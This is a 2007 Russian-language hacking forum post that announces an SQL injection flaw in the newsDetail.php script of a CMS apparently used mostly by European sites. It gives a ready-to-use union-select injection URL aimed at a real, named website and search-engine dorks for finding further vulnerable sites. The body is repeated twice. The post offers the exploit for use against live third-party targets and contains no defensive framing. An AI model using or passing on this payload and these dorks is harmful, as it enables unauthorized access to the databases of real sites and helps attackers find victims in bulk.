Scipio
09.11.2007, 23:52
На этом двиге работают в основном европейские сайты, много сайтов в зоне eu
уязвим скрипт newsDetail.php находится обычно
http://host/site/en/newsDetail.php
уязвимую версию определить не удалось, но на офф сайте я так понял ранняя версия и этому сплойту не поддается, хотя незнаю точно...
а вот собственно и сплойт c примером сайта на уязвимом движке:
http://www.pisa-project.eu/site/en/newsDetail.php?nid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16/*
Дорк: powered by Uniresearch
inurl:newsDetail.php
вобщем ковыряю дальше, если что еще найду отпишусь в этом топике
уязвим скрипт newsDetail.php находится обычно
http://host/site/en/newsDetail.php
уязвимую версию определить не удалось, но на офф сайте я так понял ранняя версия и этому сплойту не поддается, хотя незнаю точно...
а вот собственно и сплойт c примером сайта на уязвимом движке:
http://www.pisa-project.eu/site/en/newsDetail.php?nid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16/*
Дорк: powered by Uniresearch
inurl:newsDetail.php
вобщем ковыряю дальше, если что еще найду отпишусь в этом топике